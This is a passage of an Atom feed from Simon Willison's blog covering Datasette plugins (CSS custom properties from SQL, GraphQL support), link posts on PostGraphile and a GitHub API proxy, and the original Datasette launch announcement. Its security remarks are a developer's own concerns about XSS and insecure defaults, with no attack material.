&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;nav&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;This is the navigation&lt;span class="pl-kos"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="pl-ent"&gt;nav&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;To fix this, &lt;code&gt;datasette-css-properties&lt;/code&gt; supports a &lt;code&gt;?_raw=&lt;/code&gt; querystring argument for specifying that a specific named column should not be quoted, but should be returned as the exact value that came out of the database.&lt;/p&gt;
&lt;p&gt;So we add &lt;code&gt;?_raw=time-of-day-color&lt;/code&gt; to the URL &lt;a href="https://latest-with-plugins.datasette.io/fixtures.css?sql=SELECT%0D%0A++CASE%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+4%0D%0A++++AND+7+THEN+%27grey%27%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+8%0D%0A++++AND+15+THEN+%27yellow%27%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+16%0D%0A++++AND+18+THEN+%27orange%27%0D%0A++++ELSE+%27black%27%0D%0A++END+as+%5Btime-of-day-color%5D&amp;amp;_raw=time-of-day-color"&gt;to get this&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight highlight-source-css"&gt;&lt;pre&gt;:&lt;span class="pl-c1"&gt;root&lt;/span&gt; {
  &lt;span class="pl-c1"&gt;--time-of-day-color&lt;/span&gt;: yellow;
}&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;(I'm a little nervous about the &lt;code&gt;_raw=&lt;/code&gt; feature. It &lt;em&gt;feels&lt;/em&gt; like it could be a security hole, potentially as an XSS vector. I have an &lt;a href="https://github.com/simonw/datasette-css-properties/issues/1"&gt;open issue about that&lt;/a&gt; and I'd love to get some feedback - I'm serving the page with the &lt;code&gt;X-Content-Type-Options: nosniff&lt;/code&gt; HTTP header which I think should keep things secure but I'm worried there may be attack patterns that I don't know about.)&lt;/p&gt;
&lt;p&gt;Let's take a moment to admire the full HTML document for &lt;a href="https://codepen.io/simonwillison/pen/wvzXZLr"&gt;this demo&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight highlight-text-html-basic"&gt;&lt;pre&gt;&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;link&lt;/span&gt; &lt;span class="pl-c1"&gt;rel&lt;/span&gt;="&lt;span class="pl-s"&gt;stylesheet&lt;/span&gt;" &lt;span class="pl-c1"&gt;href&lt;/span&gt;="&lt;span class="pl-s"&gt;https://latest-with-plugins.datasette.io/fixtures.css?sql=SELECT%0D%0A++CASE%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+4%0D%0A++++AND+7+THEN+%27grey%27%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+8%0D%0A++++AND+15+THEN+%27yellow%27%0D%0A++++WHEN+strftime(%27%25H%27,+%27now%27)+-+8+BETWEEN+16%0D%0A++++AND+18+THEN+%27orange%27%0D%0A++++ELSE+%27black%27%0D%0A++END+as+%5Btime-of-day-color%5D&amp;amp;_raw=time-of-day-color&lt;/span&gt;"&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;style&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="pl-ent"&gt;nav&lt;/span&gt; {
  &lt;span class="pl-c1"&gt;background-color&lt;/span&gt;: &lt;span class="pl-en"&gt;var&lt;/span&gt;(&lt;span class="pl-s1"&gt;--time-of-day-color&lt;/span&gt;);
}
&lt;span class="pl-kos"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="pl-ent"&gt;style&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="pl-kos"&gt;&amp;lt;&lt;/span&gt;&lt;span class="pl-ent"&gt;nav&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;This is the navigation&lt;span class="pl-kos"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="pl-ent"&gt;nav&lt;/span&gt;&lt;span class="pl-kos"&gt;&amp;gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;That's a SQL query URL-encoded into the querystring for a stylesheet, loaded in a &lt;code&gt;&amp;lt;link&amp;gt;&lt;/code&gt; element and used to style an element on a page. It's calling and reacting to an API with not a line of JavaScript required!&lt;/p&gt;
&lt;p&gt;Is this plugin useful for anyone? Probably not, but it's a really fun idea, and it's a great illustration of how having plugins dramatically reduces the friction against trying things like this out.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css-custom-properties"&gt;css-custom-properties&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="css"/><category term="projects"/><category term="datasette"/><category term="css-custom-properties"/></entry><entry><title>Custom Properties as State</title><link href="https://simonwillison.net/2021/Jan/7/custom-properties-state/#atom-tag" rel="alternate"/><published>2021-01-07T19:39:49+00:00</published><updated>2021-01-07T19:39:49+00:00</updated><id>https://simonwillison.net/2021/Jan/7/custom-properties-state/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://css-tricks.com/custom-properties-as-state/"&gt;Custom Properties as State&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Fascinating thought experiment by Chris Coyier: since CSS custom properties can be defined in an external stylesheet, we can APIs that return stylesheets defining dynamically server-side generated CSS values for things like time-of-day colour schemes or even strings that can be inserted using &lt;code&gt;::after { content: var(--my-property)&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;This gave me a very eccentric idea for &lt;a href="https://datasette.io/plugins/datasette-css-properties"&gt;a Datasette plugin&lt;/a&gt;...


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css"&gt;css&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/css-custom-properties"&gt;css-custom-properties&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="css"/><category term="css-custom-properties"/></entry><entry><title>GraphQL in Datasette with the new datasette-graphql plugin</title><link href="https://simonwillison.net/2020/Aug/7/datasette-graphql/#atom-tag" rel="alternate"/><published>2020-08-07T04:24:01+00:00</published><updated>2020-08-07T04:24:01+00:00</updated><id>https://simonwillison.net/2020/Aug/7/datasette-graphql/#atom-tag</id><summary type="html">
    &lt;p&gt;This week I've mostly been building &lt;a href="https://github.com/simonw/datasette-graphql"&gt;datasette-graphql&lt;/a&gt;, a plugin that adds GraphQL query support to Datasette.&lt;/p&gt;

&lt;p&gt;I've been &lt;a href="https://simonwillison.net/search/?q=graphql"&gt;mulling this over&lt;/a&gt; for a couple of years now. I wasn't at all sure if it would be a good idea, but it's hard to overstate how liberating Datasette's plugin system has proven to be: plugins provide a mechanism for exploring big new ideas without any risk of taking the core project in a direction that I later regret.&lt;/p&gt;

&lt;p&gt;Now that I've built it, I think I like it.&lt;/p&gt;

&lt;h4&gt;A GraphQL refresher&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://graphql.org/"&gt;GraphQL&lt;/a&gt; is a query language for APIs, first promoted by Facebook in 2015.&lt;/p&gt;

&lt;p&gt;(Surprisingly it has nothing to do with the Facebook Graph API, which predates it by several years and is more similar to traditional REST. A third of respondents to my &lt;a href="https://twitter.com/simonw/status/1289381085181140992"&gt;recent poll&lt;/a&gt; were understandably confused by this.)&lt;/p&gt;

&lt;p&gt;GraphQL is best illustrated by an example. The following query (a real example that works with &lt;code&gt;datasette-graphql&lt;/code&gt;) does a whole bunch of work:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;Retrieves the first 10 repos that match a search for "datasette", sorted by most stargazers first&lt;/li&gt;&lt;li&gt;Shows the total count of search results, along with how to retrieve the next page&lt;/li&gt;&lt;li&gt;For each repo, retrieves an explicit list of columns&lt;/li&gt;&lt;li&gt;&lt;code&gt;owner&lt;/code&gt; is a foreign key to the &lt;code&gt;users&lt;/code&gt; table - this query retrieves the &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;html_url&lt;/code&gt; for the user that owns each repo&lt;/li&gt;&lt;li&gt;A repo has issues (via an incoming foreign key relationship). The query retrieves the first three issues, a total count of all issues and for each of those three gets the &lt;code&gt;title&lt;/code&gt; and &lt;code&gt;created_at&lt;/code&gt;.&lt;/li&gt;&lt;/ul&gt;

&lt;p&gt;That's a lot of stuff! Here's the query:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;{
  repos(first:10, search: "datasette", sort_desc: stargazers_count) {
    totalCount
    pageInfo {
      endCursor
      hasNextPage
    }
    nodes {
      full_name
      description_
      stargazers_count
      created_at
      owner {
        name
        html_url
      }
      issues_list(first: 3) {
        totalCount
        nodes {
          title
          created_at
        }
      }
    }
  }
}&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;You can &lt;a href="https://datasette-graphql-demo.datasette.io/graphql?query=%7B%0A%20%20repos(first%3A%2010%2C%20search%3A%20%22datasette%22%2C%20sort_desc%3A%20stargazers_count)%20%7B%0A%20%20%20%20totalCount%0A%20%20%20%20pageInfo%20%7B%0A%20%20%20%20%20%20endCursor%0A%20%20%20%20%20%20hasNextPage%0A%20%20%20%20%7D%0A%20%20%20%20nodes%20%7B%0A%20%20%20%20%20%20full_name%0A%20%20%20%20%20%20description_%0A%20%20%20%20%20%20stargazers_count%0A%20%20%20%20%20%20created_at%0A%20%20%20%20%20%20owner%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20html_url%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20issues_list(first%3A%203)%20%7B%0A%20%20%20%20%20%20%20%20totalCount%0A%20%20%20%20%20%20%20%20nodes%20%7B%0A%20%20%20%20%20%20%20%20%20%20title%0A%20%20%20%20%20%20%20%20%20%20created_at%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%7D%0A"&gt;run this query against the live demo&lt;/a&gt;. I'm seeing it return results in 511ms. Considering how much it's getting done that's pretty good!&lt;/p&gt;

&lt;h4&gt;datasette-graphql&lt;/h4&gt;

&lt;p&gt;The &lt;a href="https://github.com/simonw/datasette-graphql"&gt;datasette-graphql&lt;/a&gt; plugin adds a &lt;code&gt;/graphql&lt;/code&gt; page to any Datasette instance. It exposes a GraphQL field for every table and view. Those fields can be used to select, filter, search and paginate through rows in the corresponding table.&lt;/p&gt;

&lt;p&gt;The plugin detects foreign key relationships - both incoming and outgoing - and turns those into further nested fields on the rows.&lt;/p&gt;

&lt;p&gt;It does this by using table introspection (powered by &lt;a href="https://sqlite-utils.readthedocs.io/en/stable/python-api.html#introspection"&gt;sqlite-utils&lt;/a&gt;) to dynamically define a schema using the &lt;a href="https://graphene-python.org/"&gt;Graphene&lt;/a&gt; Python GraphQL library.&lt;/p&gt;

&lt;p&gt;Most of the work happens in the &lt;code&gt;schema_for_datasette()&lt;/code&gt; function in &lt;a href="https://github.com/simonw/datasette-graphql/blob/main/datasette_graphql/utils.py"&gt;datasette_graphql/utils.py&lt;/a&gt;. The code is a little fiddly because Graphene usually expects you to define your GraphQL schema using classes (similar to Django's ORM), but in this case the schema needs to be generated dynamically based on introspecting the tables and columns.&lt;/p&gt;

&lt;p&gt;It has a solid set of unit tests, including some &lt;a href="https://github.com/simonw/datasette-graphql/tree/main/examples"&gt;test examples&lt;/a&gt; written in Markdown which double as further documentation (see &lt;a href="https://github.com/simonw/datasette-graphql/blob/950ca0740a658780cdd3a91e4bbfdda4f48645ea/tests/test_graphql.py#L62-L74"&gt;test_graphql_examples()&lt;/a&gt;).&lt;/p&gt;

&lt;h4&gt;GraphiQL for interactively exploring APIs&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/graphql/graphiql"&gt;GraphiQL&lt;/a&gt; is the best thing about GraphQL. It's a JavaScript interface for trying out GraphQL queries which pulls in a copy of the API schema and uses it to implement really comprehensive autocomplete.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;datasette-graphql&lt;/code&gt; includes GraphiQL (inspired by &lt;a href="https://www.starlette.io/graphql/"&gt;Starlette's implementation&lt;/a&gt;). Here's an animated gif showing quite how useful it is for exploring an API:&lt;/p&gt;

&lt;p&gt;&lt;img alt="Animated demo" src="https://static.simonwillison.net/static/2020/graphiql.gif" style="max-width: 100%" /&gt;&lt;/p&gt;

&lt;p&gt;A couple of tips: On macOS &lt;samp&gt;option+space&lt;/samp&gt; brings up the full completion list for the current context, and &lt;samp&gt;command+enter&lt;/samp&gt; executes the current query (equivalent to clicking the play button).&lt;/p&gt;

&lt;h4&gt;Performance notes&lt;/h4&gt;

&lt;p&gt;The most convenient thing about GraphQL from a client-side development point of view is also the most nerve-wracking from the server-side: a single GraphQL query can end up executing a LOT of SQL.&lt;/p&gt;

&lt;p&gt;The example above executes at least 32 separate SQL queries:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;1 select against repos (plus 1 count query)&lt;/li&gt;&lt;li&gt;10 against issues (plus 10 counts)&lt;/li&gt;&lt;li&gt;10 against users (for the &lt;code&gt;owner&lt;/code&gt; field)&lt;/li&gt;&lt;/ul&gt;

&lt;p&gt;There are some optimization tricks I'm not using yet (in particular the &lt;a href="https://docs.graphene-python.org/en/latest/execution/dataloader/"&gt;DataLoader pattern&lt;/a&gt;) but it's still cause for concern.&lt;/p&gt;

&lt;p&gt;Interestingly, SQLite may be the best possible database backend for GraphQL due to the characteristics explained in the essay &lt;a href="https://sqlite.org/np1queryprob.html"&gt;Many Small Queries Are Efficient In SQLite&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Since SQLite is an in-process database, it doesn't have to deal with network overhead for each SQL query that it executes. A SQL query is essentially a C function call. So the flurry of queries that's characteristic for GraphQL really plays to SQLite's unique strengths.&lt;/p&gt;

&lt;p&gt;Datasette has always featured arbitrary SQL execution as a core feature, which it protects using query time limits. I have an &lt;a href="https://github.com/simonw/datasette-graphql/issues/33"&gt;open issue&lt;/a&gt; to further extend the concept of Datasette's time limits to the overall execution of a GraphQL query.&lt;/p&gt;

&lt;h4&gt;More demos&lt;/h4&gt;

&lt;p&gt;Enabling a GraphQL instance for a Datasette is as simple as &lt;code&gt;pip install datasette-graphql&lt;/code&gt;, so I've deployed the new plugin in a few other places:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;&lt;a href="https://covid-19.datasettes.com/graphql"&gt;covid-19.datasettes.com/graphql&lt;/a&gt; for exploring &lt;a href="https://simonwillison.net/2020/Mar/11/covid-19/"&gt;Covid-19 data&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://register-of-members-interests.datasettes.com/graphql"&gt;register-of-members-interests.datasettes.com/graphql&lt;/a&gt; for exploring &lt;a href="https://simonwillison.net/2018/Apr/25/register-members-interests/"&gt;UK Register of Members Interests&lt;/a&gt; MP data&lt;/li&gt;
&lt;li&gt;&lt;a href="https://til.simonwillison.net/graphql"&gt;til.simonwillison.net/graphql&lt;/a&gt; for exploring &lt;a href="https://simonwillison.net/2020/Apr/20/self-rewriting-readme/"&gt;my TILs&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;

&lt;h4&gt;Future improvements&lt;/h4&gt;

&lt;p&gt;I have a bunch of &lt;a href="https://github.com/simonw/datasette-graphql/issues"&gt;open issues&lt;/a&gt; for the plugin describing what I want to do with it next. The most notable &lt;a href="https://github.com/simonw/datasette-graphql/issues/16"&gt;planned improvement&lt;/a&gt; is adding support for Datasette's canned queries.&lt;/p&gt;

&lt;p&gt;Andy Ingram &lt;a href="https://twitter.com/andrewingram/status/1289624490037530625"&gt;shared the following&lt;/a&gt; interesting note on Twitter:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;The GraphQL creators are (I think) unanimous in their skepticism of tools that bring GraphQL directly to your database or ORM, because they just provide carte blanche access to your entire data model, without actually giving API design proper consideration.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;My plugin does exactly that. Datasette is a tool for publishing raw data, so exposing everything is very much in line with the philosophy of the project. But it's still smart to put some design thought into your APIs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://datasette.readthedocs.io/en/stable/sql_queries.html#canned-queries"&gt;Canned queries&lt;/a&gt; are pre-baked SQL queries, optionally with parameters that can be populated by the user.&lt;/p&gt;

&lt;p&gt;These could map directly to GraphQL fields. Users could even use plugin configuration to turn off the automatic table fields and just expose their canned queries.&lt;/p&gt;

&lt;p&gt;In this way, canned queries can allow users to explicitly design the fields they expose via GraphQL. I expect this to become an extremely productive way of prototyping new GraphQL APIs, even if the final API is built on a backend other than Datasette.&lt;/p&gt;

&lt;h4&gt;Also this week&lt;/h4&gt;

&lt;p&gt;A couple of years ago I wrote a piece about &lt;a href="https://simonwillison.net/2018/Apr/25/register-members-interests/"&gt;Exploring the UK Register of Members Interests with SQL and Datasette&lt;/a&gt;. I finally got around to automating this using GitHub Actions, so &lt;a href="https://register-of-members-interests.datasettes.com/"&gt;register-of-members-interests.datasettes.com&lt;/a&gt; now updates with the latest data every 24 hours.&lt;/p&gt;

&lt;p&gt;I renamed &lt;code&gt;datasette-publish-now&lt;/code&gt; to &lt;a href="https://github.com/simonw/datasette-publish-vercel"&gt;datasette-publish-vercel&lt;/a&gt;, reflecting Vercel's name change from Zeit Now. Here's &lt;a href="https://github.com/simonw/datasette-publish-vercel/issues/26"&gt;how I did that&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/simonw/datasette-insert"&gt;datasette-insert&lt;/a&gt;, which provides a JSON API for inserting data, defaulted to working unauthenticated. MongoDB and Elasticsearch have taught us that insecure-by-default inevitably leads to &lt;a href="https://arstechnica.com/information-technology/2020/07/more-than-1000-databases-have-been-nuked-by-mystery-meow-attack/"&gt;insecure deployments&lt;/a&gt;. I fixed that: the plugin now requires authentication, and if you don't want to set that up and know what you are doing you can install the deliberately named &lt;a href="https://github.com/simonw/datasette-insert-unsafe"&gt;datasette-insert-unsafe&lt;/a&gt; plugin to allow unauthenticated access.&lt;/p&gt;

&lt;h4&gt;Releases this week&lt;/h4&gt;

&lt;ul&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-graphql/releases/tag/0.7"&gt;datasette-graphql 0.7&lt;/a&gt; - 2020-08-06&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-graphql/releases/tag/0.6"&gt;datasette-graphql 0.6&lt;/a&gt; - 2020-08-06&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/sqlite-utils/releases/tag/2.14.1"&gt;sqlite-utils 2.14.1&lt;/a&gt; - 2020-08-06&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-graphql/releases/tag/0.5"&gt;datasette-graphql 0.5&lt;/a&gt; - 2020-08-06&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-graphql/releases/tag/0.4"&gt;datasette-graphql 0.4&lt;/a&gt; - 2020-08-06&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-graphql/releases/tag/0.3"&gt;datasette-graphql 0.3&lt;/a&gt; - 2020-08-06&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-graphql/releases/tag/0.2"&gt;datasette-graphql 0.2&lt;/a&gt; - 2020-08-06&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-graphql/releases/tag/0.1a"&gt;datasette-graphql 0.1a&lt;/a&gt; - 2020-08-02&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/sqlite-utils/releases/tag/2.14"&gt;sqlite-utils 2.14&lt;/a&gt; - 2020-08-01&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-insert-unsafe/releases/tag/0.1"&gt;datasette-insert-unsafe 0.1&lt;/a&gt; - 2020-07-31&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-insert/releases/tag/0.6"&gt;datasette-insert 0.6&lt;/a&gt; - 2020-07-31&lt;/li&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/datasette-publish-vercel/releases/tag/0.7"&gt;datasette-publish-vercel 0.7&lt;/a&gt; - 2020-07-31&lt;/li&gt;&lt;/ul&gt;

&lt;h4&gt;TIL this week&lt;/h4&gt;

&lt;ul&gt;&lt;li&gt;&lt;a href="https://github.com/simonw/til/blob/master/cloudrun/ship-dockerfile-to-cloud-run.md"&gt;How to deploy a folder with a Dockerfile to Cloud Run&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/graphql"&gt;graphql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="apis"/><category term="plugins"/><category term="projects"/><category term="sqlite"/><category term="graphql"/><category term="datasette"/><category term="weeknotes"/></entry><entry><title>PostGraphile: Production Considerations</title><link href="https://simonwillison.net/2020/Mar/27/postgraphile-production-considerations/#atom-tag" rel="alternate"/><published>2020-03-27T01:22:52+00:00</published><updated>2020-03-27T01:22:52+00:00</updated><id>https://simonwillison.net/2020/Mar/27/postgraphile-production-considerations/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.graphile.org/postgraphile/production/"&gt;PostGraphile: Production Considerations&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
PostGraphile is a tool for building a GraphQL API on top of an existing PostgreSQL schema. Their “production considerations” documentation is particularly interesting because it directly addresses some of my biggest worries about GraphQL: the potential for someone to craft an expensive query that ties up server resources. PostGraphile suggests a number of techniques for avoiding this, including a statement timeout, a query allowlist, pagination caps and (in their “pro” version) a cost limit that uses a calculated cost score for the query.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/postgresql"&gt;postgresql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/scaling"&gt;scaling&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/graphql"&gt;graphql&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="postgresql"/><category term="scaling"/><category term="graphql"/></entry><entry><title>Building a stateless API proxy</title><link href="https://simonwillison.net/2019/May/30/building-a-stateless-api-proxy/#atom-tag" rel="alternate"/><published>2019-05-30T04:28:55+00:00</published><updated>2019-05-30T04:28:55+00:00</updated><id>https://simonwillison.net/2019/May/30/building-a-stateless-api-proxy/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.thea.codes/building-a-stateless-api-proxy/"&gt;Building a stateless API proxy&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
This is a really clever idea. The GitHub API is infuriatingly coarsely grained with its permissions: you often end up having to create a token with way more permissions than you actually need for your project. Thea Flowers proposes running your own proxy in front of their API that adds more finely grained permissions, based on custom encrypted proxy API tokens that use JWT to encode the original API key along with the permissions you want to grant to that particular token (as a list of regular expressions matching paths on the underlying API).

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/theavalkyrie/status/1133864634178424832"&gt;@theavalkyrie&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/apis"&gt;apis&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/encryption"&gt;encryption&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/proxies"&gt;proxies&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/security"&gt;security&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/jwt"&gt;jwt&lt;/a&gt;&lt;/p&gt;



</summary><category term="apis"/><category term="encryption"/><category term="github"/><category term="proxies"/><category term="security"/><category term="jwt"/></entry><entry><title>Datasette: instantly create and publish an API for your SQLite databases</title><link href="https://simonwillison.net/2017/Nov/13/datasette/#atom-tag" rel="alternate"/><published>2017-11-13T23:49:28+00:00</published><updated>2017-11-13T23:49:28+00:00</updated><id>https://simonwillison.net/2017/Nov/13/datasette/#atom-tag</id><summary type="html">
    &lt;p&gt;I just shipped the first public version of &lt;a href="https://github.com/simonw/datasette"&gt;datasette&lt;/a&gt;, a new tool for creating and publishing JSON APIs for SQLite databases.&lt;/p&gt;
&lt;p&gt;You can try out out right now at &lt;a href="https://fivethirtyeight.datasettes.com/"&gt;fivethirtyeight.datasettes.com&lt;/a&gt;, where you can explore SQLite databases I built from Creative Commons licensed CSV files &lt;a href="https://github.com/fivethirtyeight/data"&gt;published by FiveThirtyEight&lt;/a&gt;. Or you can check out &lt;a href="https://parlgov.datasettes.com/"&gt;parlgov.datasettes.com&lt;/a&gt;, derived from the &lt;a href="http://www.parlgov.org/"&gt;parlgov.org&lt;/a&gt; database of world political parties which illustrates some advanced features such as &lt;a href="https://parlgov.datasettes.com/parlgov-25f9855/view_party"&gt;SQLite views&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://fivethirtyeight.datasettes.com/fivethirtyeight/most-common-name%2Fsurnames"&gt;&lt;img alt="Common surnames from fivethirtyeight" src="https://static.simonwillison.net/static/2017/fivethirtyeight-surnames.png"  style="width: 100%" /&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Or you can try it out on your own machine. If you run OS X and use Google Chrome, try running the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;pip3 install datasette
datasette ~/Library/Application\ Support/Google/Chrome/Default/History
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This will start a web server on &lt;a href="http://127.0.0.1:8001/"&gt;http://127.0.0.1:8001/&lt;/a&gt; displaying an interface that will let you browse your Chrome browser history, which is conveniently stored in a SQLite database.&lt;/p&gt;
&lt;p&gt;Got a SQLite database you want to share with the world? Provided you have &lt;a href="https://zeit.co/now"&gt;Zeit Now&lt;/a&gt; set up on your machine, you can publish one or more databases with a single command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;datasette publish now my-database.db
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The above command will whir away for about a minute and then spit out a URL to a hosted version of datasette with your database (or databases) ready to go. This is how I’m hosting the fivethirtyeight and parlgov example datasets, albeit on a custom domain behind a &lt;a href="https://cloudflare.com/"&gt;Cloudflare&lt;/a&gt; cache.&lt;/p&gt;
&lt;h2&gt;&lt;a id="The_datasette_API_19"&gt;&lt;/a&gt;The datasette API&lt;/h2&gt;
&lt;p&gt;Everything datasette can do is driven by URLs. Queries can produce responsive HTML pages (I’m using a variant of &lt;a href="https://css-tricks.com/responsive-data-tables/"&gt;this responsive tables pattern&lt;/a&gt; for smaller screens) or with the &lt;code&gt;.json&lt;/code&gt; or &lt;code&gt;.jsono&lt;/code&gt; extension can produce JSON. All JSON responses are served with an &lt;code&gt;Access-Control-Allow-Origin: *&lt;/code&gt; HTTP header, meaning you can query them from any page.&lt;/p&gt;
&lt;p&gt;You can try that right now in your browser’s developer console. Navigate to &lt;a href="http://www.example.com/"&gt;http://www.example.com/&lt;/a&gt; and enter the following in the console:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fetch(
    &amp;quot;https://fivethirtyeight.datasettes.com/fivethirtyeight-2628db9/avengers%2Favengers.jsono&amp;quot;
).then(
    r =&amp;gt; r.json()
).then(data =&amp;gt; console.log(
    JSON.stringify(data.rows[0], null, '  ')
))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You’ll see the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;{
  &amp;quot;rowid&amp;quot;: 1,
  &amp;quot;URL&amp;quot;: &amp;quot;http://marvel.wikia.com/Henry_Pym_(Earth-616)&amp;quot;,
  &amp;quot;Name/Alias&amp;quot;: &amp;quot;Henry Jonathan \&amp;quot;Hank\&amp;quot; Pym&amp;quot;,
  &amp;quot;Appearances&amp;quot;: 1269,
  &amp;quot;Gender&amp;quot;: &amp;quot;MALE&amp;quot;,
  &amp;quot;Full/Reserve Avengers Intro&amp;quot;: &amp;quot;Sep-63&amp;quot;,
  &amp;quot;Year&amp;quot;: 1963,
  &amp;quot;Years since joining&amp;quot;: 52,
  ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since the API sits behind Cloudflare with a year-long cache expiry header, responses to any query like this should be lightning-fast.&lt;/p&gt;
